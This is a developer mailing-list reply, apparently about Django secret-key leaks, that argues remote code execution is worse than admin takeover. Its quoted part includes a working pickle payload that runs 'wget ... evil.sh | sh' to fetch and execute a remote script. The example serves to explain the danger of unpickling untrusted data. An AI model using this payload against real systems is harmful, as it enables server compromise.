Hi,

On Sunday, October 2, 2011 2:31:19 PM UTC+2, Paul McMillan wrote:

> > P.S.: Btw, if you leak your secret key, you can get an admin user with a
> > json backend too, while not being remote code execution it's still
> something
> > I would consider as catastrophic as code execution in most of my
> projects.
>
> No. It's far less catastrophic. It just means I'm a Django admin and can
> trash that project (which you can then restore from the backups). I can't
> own all your other Django projects on the same machine, steal your deploy
> keys, root your server, and then configure it to attack your dev machine
> when you SSH into it to see why weird things are happening. Remote code
> execution is BAD.

Okay even if you disagree, I consider both catastrophic (For me there is no
such thing as less catastrophic -- heads would roll in either case).

> data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh |
> sh'\ntR.'"
> import pickle; pickle.loads(data)
>
> And then open a new bash window.

Wow, I have to read up on pickle again, thanks for the great example --
though my "paranoia" forced me to try it without "|sh" no matter how
trustworthy you are ;)

Thanks again for the explanation.

Cheers,
Florian